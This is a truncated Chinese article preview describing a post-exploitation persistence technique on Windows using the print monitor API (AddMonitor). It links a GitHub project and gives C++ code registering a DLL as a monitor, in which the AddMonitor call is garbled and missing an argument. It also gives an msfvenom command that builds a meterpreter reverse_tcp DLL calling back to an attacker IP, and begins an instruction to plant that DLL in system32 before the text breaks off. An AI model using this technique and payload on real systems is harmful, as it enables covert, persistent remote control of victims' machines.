一种后渗透阶段权限维持方法

文章预览

项目地址 https://github.com/Al1ex/Monitor 项目说明 用于实现后渗透测试阶段权限维持 项目使用 Step1 ：下载该项目，之后使用VS编译Monitor.cpp，当然也可以使用编译好的，Monitor.cpp代码如下所示： # include "Windows.h" int main () { MONITOR_INFO_2 monitorInfo; TCHAR env[ 12 ] = TEXT( "Windows x64" ); TCHAR name[ 12 ] = TEXT( "Monitor" ); TCHAR dll[ 12 ] = TEXT( "test.dll" ); monitorInfo.pName = name; monitorInfo.pEnvironment = env; monitorInfo.pDLLName = dll; AddMonitor( NULL , 2 , (LPBYTE) ); return 0 ; } pName //监视器名称 pEnvironment //环境架构 pDLLName //监视器DLL文件的名称 Step 2：使用Msfvenom生成dll攻击载荷： msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= 192.168.188.129 LPORT= 4444 -f dll > shell.dll Step 3：将shell.dll复制到目标主机的system32目录下，之后重命名为test.dll(也就是上面的PDLLName，你也可以自己修改为自己喜欢的 ………………………………